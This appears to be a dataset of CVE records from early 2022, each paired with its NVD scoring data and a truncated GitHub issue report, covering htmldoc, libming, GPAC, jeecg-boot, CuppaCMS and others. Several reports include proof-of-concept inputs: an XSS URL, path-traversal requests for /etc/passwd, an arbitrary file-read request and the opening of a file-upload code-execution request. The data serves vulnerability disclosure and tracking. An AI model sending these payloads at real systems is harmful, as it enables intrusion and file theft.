{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/410" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:1.9.11:*:*:*:*:*:*:*", "matchCriteriaId": "F3C6490A-0378-4647-A044-BE4C49DC2904", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
https://github.com/michaelrsweet/htmldoc/issues/410
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
While fuzzing htmldoc I found a segmentation fault in the copy_image() function, in epub.cxx:1221 testcase:(zipped so GitHub accepts it) [crash01.html.zip](https://github.com/michaelrsweet/htmldoc/files/5854045/crash01.html.zip) reproduced by running: ``` htmldoc -f demo.epub crash01.html ``` html...
SEGV on unknown address 0x000000000000
https://api.github.com/repos/michaelrsweet/htmldoc/issues/410/comments
2
2021-01-22T07:34:10Z
2022-03-11T02:53:22Z
https://github.com/michaelrsweet/htmldoc/issues/410
791,775,016
410
CVE-2022-0730
2022-03-03T23:15:08.253
Under certain ldap conditions, Cacti authentication can be bypassed with certain credential types.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cacti/cacti/issues/4562" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.deb...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cacti:cacti:1.2.19:*:*:*:*:*:*:*", "matchCriteriaId": "A4BB8CCB-5F52-4248-947C-3F4F1211EF53", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
https://github.com/Cacti/cacti/issues/4562
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Cacti", "cacti" ]
# Describe the bug Under certain ldap conditions, Cacti authentication can be bypassed with certain credential types. ## Expected behavior Cacti security model should work when Anonymous binding is enabled.
When using LDAP, authentication process may be bypassed
https://api.github.com/repos/Cacti/cacti/issues/4562/comments
3
2022-02-21T18:07:52Z
2022-12-02T00:02:09Z
https://github.com/Cacti/cacti/issues/4562
1,146,096,866
4,562
CVE-2021-34122
2022-03-10T17:42:36.623
The function bitstr_tell at bitstr.c in ffjpeg commit 4ab404e has a NULL pointer dereference.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/issues/36" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rockca...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rockcarry:ffjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "B275DEF0-B89A-4794-8276-E4BF906BBB00", "versionEndExcluding": "2021-03-16", "versionEndIncluding": null, "versionStartE...
https://github.com/rockcarry/ffjpeg/issues/36
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "rockcarry", "ffjpeg" ]
Hi, There is null pointer dereference in function bitstr_tell() and bitstr_close() in bitstr.c. Didn't check whether the stream is valid . ``` long bitstr_tell(void *stream) { int type = *(int*)stream; if (!stream) return EOF; ... } int bitstr_close(void *stream) { int type = *(int*...
null pointer dereference in function bitstr_tell() in bitstr.c
https://api.github.com/repos/rockcarry/ffjpeg/issues/36/comments
4
2021-05-13T09:08:27Z
2021-05-17T05:51:39Z
https://github.com/rockcarry/ffjpeg/issues/36
890,871,244
36
CVE-2021-34338
2022-03-10T17:42:36.847
Ming 0.4.8 has an out-of-bounds buffer overwrite issue in the function getName() in decompiler.c file that causes a direct segmentation fault and leads to denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "patrick@puiterwijk.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969616" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
https://github.com/libming/libming/issues/201
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, there. There is a segmentation fault in the newest master branch 04aee52. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [seg-decompile457.zip](https://github.com/libming/libming/files/5118022/seg-decompile457.zip) Here is the reproduce trace reported by ASAN: ~~~~ ==19422==ERROR: Addr...
Segmentation fault in function getName, decompile.c:457
https://api.github.com/repos/libming/libming/issues/201/comments
0
2020-08-24T13:27:16Z
2020-08-24T13:30:07Z
https://github.com/libming/libming/issues/201
684,668,891
201
CVE-2021-34339
2022-03-10T17:42:37.283
Ming 0.4.8 has an out-of-bounds buffer access issue in the function getString() in decompiler.c file that causes a direct segmentation fault and leads to denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "patrick@puiterwijk.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969607" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https:/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
https://github.com/libming/libming/issues/202
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, there. There is a segmentation fault in the newest master branch 04aee52. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [seg-decompile380.zip](https://github.com/libming/libming/files/5118100/seg-decompile380.zip) Here is the reproduce trace reported by ASAN: ~~~~ ==187067==ERROR: A...
Segmentation fault in function getString, decompile.c:380
https://api.github.com/repos/libming/libming/issues/202/comments
1
2020-08-24T13:33:55Z
2020-08-24T14:49:29Z
https://github.com/libming/libming/issues/202
684,675,767
202
CVE-2021-34340
2022-03-10T17:42:37.657
Ming 0.4.8 has an out-of-bounds buffer access issue in the function decompileINCR_DECR() in decompiler.c file that causes a direct segmentation fault and leads to denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "patrick@puiterwijk.org", "tags": [ "Issue Tracking" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969612" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/is...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
https://github.com/libming/libming/issues/203
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, there. There is a segmentation fault in the newest master branch 04aee52. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [seg-decompile1640.zip](https://github.com/libming/libming/files/5123144/seg-decompile1640.zip) Here is the reproduce trace reported by ASAN: ~~~~ ==79767==ERROR: ...
Segmentation fault in function decompileINCR_DECR, decompile.c 1640
https://api.github.com/repos/libming/libming/issues/203/comments
0
2020-08-25T10:33:55Z
2020-08-25T10:33:55Z
https://github.com/libming/libming/issues/203
685,372,287
203
CVE-2021-34341
2022-03-10T17:42:37.920
Ming 0.4.8 has an out-of-bounds read vulnerability in the function decompileIF() in the decompile.c file that causes a direct segmentation fault and leads to denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "patrick@puiterwijk.org", "tags": [ "Issue Tracking" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969628" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/is...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
https://github.com/libming/libming/issues/204
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, there. There is a buffer overflow in the newest master branch 04aee52. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [overflow-decompiler2516.zip](https://github.com/libming/libming/files/5123238/overflow-decompiler2516.zip) Here is the reproduce trace reported by ASAN: ~~~~ ==16585...
Buffer overflow in decompileIF, decompile.c:2516
https://api.github.com/repos/libming/libming/issues/204/comments
0
2020-08-25T10:45:49Z
2020-08-25T10:45:49Z
https://github.com/libming/libming/issues/204
685,379,611
204
CVE-2021-34342
2022-03-10T17:42:38.207
Ming 0.4.8 has an out-of-bounds read vulnerability in the function newVar_N() in decompile.c which causes a huge information leak.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL...
[ { "source": "patrick@puiterwijk.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969619" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
https://github.com/libming/libming/issues/205
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, there. There is a buffer overflow in the newest master branch 04aee52 which causes a huge memory information leakage. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [overflow-decompiler751.zip](https://github.com/libming/libming/files/5123287/overflow-decompiler751.zip) Here is the r...
Buffer overflow in newVar_N, decompile.c:751
https://api.github.com/repos/libming/libming/issues/205/comments
0
2020-08-25T10:55:36Z
2020-08-25T10:55:36Z
https://github.com/libming/libming/issues/205
685,385,426
205
CVE-2021-44585
2022-03-10T21:15:14.397
A Cross Site Scripting (XSS) vulnerabilitiy exits in jeecg-boot 3.0 in /jeecg-boot/jmreport/view with a mouseover event.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/3223" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "45720048-60C0-4FA8-AA09-16C8CF329FD3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
https://github.com/jeecgboot/jeecg-boot/issues/3223
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: 3.0 ##### 问题描述: http://boot.jeecg.com:8080/jeecg-boot/jmreport/view/')%22onmouseover=alert('hacking')%20%20( ##### 截图&代码: ![image](https://user-images.githubusercontent.com/63626545/144021468-eedd94b9-694a-435d-8588-a747f3410ab2.png)
反射型XSS漏洞
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/3223/comments
4
2021-11-30T09:33:40Z
2022-03-14T01:15:49Z
https://github.com/jeecgboot/JeecgBoot/issues/3223
1,067,002,316
3,223
CVE-2022-24726
2022-03-10T21:15:14.603
Istio is an open platform to connect, manage, and secure microservices. In affected versions the Istio control plane, istiod, is vulnerable to a request processing error, allowing a malicious attacker that sends a specially crafted message which results in the control plane crashing when the validating webhook for a cl...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/golang/go/issues/51112" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:istio:istio:*:*:*:*:*:*:*:*", "matchCriteriaId": "E255ACB0-90AB-4FC4-AC4B-D7DE613A115E", "versionEndExcluding": "1.11.8", "versionEndIncluding": null, "versionStartExcluding"...
https://github.com/golang/go/issues/51112
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "golang", "go" ]
On 64-bit system, a large enough regexp can be deeply nested enough to cause goroutine stack overflows (the kind where the runtime says no more stack for you and exits). Specifically, strings.Repeat("(", 1<<20)+strings.Repeat(")", 1<<20) is enough. I ran a test inside Google using C++ RE2 limiting the nesting depth of...
regexp: stack overflow (process exit) handling deeply nested regexp
https://api.github.com/repos/golang/go/issues/51112/comments
9
2022-02-09T20:13:46Z
2023-06-22T21:55:10Z
https://github.com/golang/go/issues/51112
1,128,977,907
51,112
CVE-2020-36518
2022-03-11T07:15:07.800
jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2816" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url"...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "E4445932-0923-4D28-8911-CFC9B61DFE2B", "versionEndExcluding": "2.12.6.1", "versionEndIncluding": null, "versi...
https://github.com/FasterXML/jackson-databind/issues/2816
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
**EDIT**: related to to CVE-2020-36518 (see https://nvd.nist.gov/vuln/detail/CVE-2020-36518) **EDIT**: Fix included in * 2.14.0 * 2.13.3: * Was also included in 2.13.2.1 and 2.13.2.2 (see https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.13); to be used with `jackson-bom` version `2.13.2.20220328...
Optimize `UntypedObjectDeserializer` wrt recursion [CVE-2020-36518]
https://api.github.com/repos/FasterXML/jackson-databind/issues/2816/comments
77
2020-08-13T01:12:31Z
2022-11-18T17:40:21Z
https://github.com/FasterXML/jackson-databind/issues/2816
678,075,273
2,816
CVE-2022-26967
2022-03-12T22:15:08.757
GPAC 2.0 allows a heap-based buffer overflow in gf_base64_encode. It can be triggered via MP4Box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2138" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "22E296B6-C912-468A-8A88-EC33272D81FC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": nu...
https://github.com/gpac/gpac/issues/2138
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough info...
[BUG] heap-buffer-overflow in gf_base64_encode
https://api.github.com/repos/gpac/gpac/issues/2138/comments
3
2022-03-10T09:47:43Z
2022-08-03T09:44:25Z
https://github.com/gpac/gpac/issues/2138
1,164,990,736
2,138
CVE-2022-24575
2022-03-14T14:15:07.830
GPAC 1.0.1 is affected by a stack-based buffer overflow through MP4Box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2058" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://huntr.dev/b...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
https://github.com/gpac/gpac/issues/2058
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
``` Proof of Concept Version: MP4Box - GPAC version 1.1.0-DEV-rev1647-gb6f68145e-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/12...
Use After Free
https://api.github.com/repos/gpac/gpac/issues/2058/comments
1
2022-01-21T08:54:48Z
2022-01-21T11:26:56Z
https://github.com/gpac/gpac/issues/2058
1,110,211,366
2,058
CVE-2022-24576
2022-03-14T14:15:07.877
GPAC 1.0.1 is affected by Use After Free through MP4Box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2061" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://huntr.dev/b...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
https://github.com/gpac/gpac/issues/2061
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
``` Proof of Concept Version: MP4Box - GPAC version 1.1.0-DEV-rev1646-gddd7990bb-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/12...
Heap-based Buffer Overflow
https://api.github.com/repos/gpac/gpac/issues/2061/comments
0
2022-01-21T08:56:18Z
2022-01-21T11:26:35Z
https://github.com/gpac/gpac/issues/2061
1,110,212,655
2,061
CVE-2022-25485
2022-03-15T18:15:12.047
CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/24" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/CuppaCMS/CuppaCMS/issues/24
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
Product version:cuppaCMS v1.0 [http://cuppacms.com/files/cuppa_cms.zip](http://cuppacms.com/files/cuppa_cms.zip) ## poc ``` POST /alerts/alertLightbox.php url=../../../../../../../../../../../etc/passwd ``` <img width="1268" alt="image" src="https://user-images.githubusercontent.com/38547290/154226358-354ef363-b...
Unauthorized local file inclusion (LFI) vulnerability exists via the url parameter in /alerts/alertLightbox.php
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/24/comments
1
2022-02-16T08:43:24Z
2022-02-16T11:37:28Z
https://github.com/CuppaCMS/CuppaCMS/issues/24
1,139,705,740
24
CVE-2022-25486
2022-03-15T18:15:12.230
CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/15" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/CuppaCMS/CuppaCMS/issues/15
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
Greetings, I found a LFI vulnerability in CuppaCMS. How is disclosure process exactly done. Can you provide me an email where I can contact you with the details.
Multiple non authenticated local file inclusions found
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/15/comments
0
2022-01-04T14:09:43Z
2023-11-14T23:17:28Z
https://github.com/CuppaCMS/CuppaCMS/issues/15
1,093,392,205
15
CVE-2022-25486
2022-03-15T18:15:12.230
CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/15" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/CuppaCMS/CuppaCMS/issues/25
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
Product version:cuppaCMS v1.0 [http://cuppacms.com/files/cuppa_cms.zip](http://cuppacms.com/files/cuppa_cms.zip) ## poc ``` POST /alerts/alertConfigField.php urlConfig=../../../../../../../../../../../../../../etc/passwd ``` ![image](https://user-images.githubusercontent.com/38547290/154229228-9fd38bfd-af68-4231-...
Unauthorized local file inclusion (LFI) vulnerability exists via the urlConfig parameter in /alerts/alertConfigField.php
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/25/comments
0
2022-02-16T08:54:20Z
2023-11-14T23:14:18Z
https://github.com/CuppaCMS/CuppaCMS/issues/25
1,139,719,083
25
CVE-2022-25495
2022-03-15T18:15:12.840
The component /jquery_file_upload/server/php/index.php of CuppaCMS v1.0 allows attackers to upload arbitrary files and execute arbitrary code via a crafted PHP file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/26" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/CuppaCMS/CuppaCMS/issues/26
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
An Non-authenticated attacker can upload arbitrary file via the /js/jquery_file_upload/server/php/index.php and executing it on the server reaching the RCE. ## poc ``` POST /classes/ajax/Functions.php HTTP/1.1 Host: localhost:8888 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XM...
Unauthorized Remote Code Execution vulnerability exists in Cuppa cms via file upload function
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/26/comments
0
2022-02-19T14:51:30Z
2022-02-19T17:04:10Z
https://github.com/CuppaCMS/CuppaCMS/issues/26
1,144,737,764
26
CVE-2022-25497
2022-03-15T18:15:12.920
CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/28" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/CuppaCMS/CuppaCMS/issues/28
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
An Unauthorized attacker can read arbitrary file via copy function ## poc ``` POST /js/filemanager/api/index.php HTTP/1.1 Host: localhost:8888 Content-Type: application/json Origin: http://localhost:8888 Content-Length: 98 {"from":"//../../../../../../../../../../../../../etc/passwd","to":"/../out.txt","acti...
Unauthorized Arbitrary File Read vulnerability exists in CuppaCMS
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/28/comments
0
2022-02-19T16:22:14Z
2022-02-19T16:22:14Z
https://github.com/CuppaCMS/CuppaCMS/issues/28
1,144,774,030
28
CVE-2022-25498
2022-03-15T18:15:12.990
CuppaCMS v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the saveConfigData function in /classes/ajax/Functions.php.
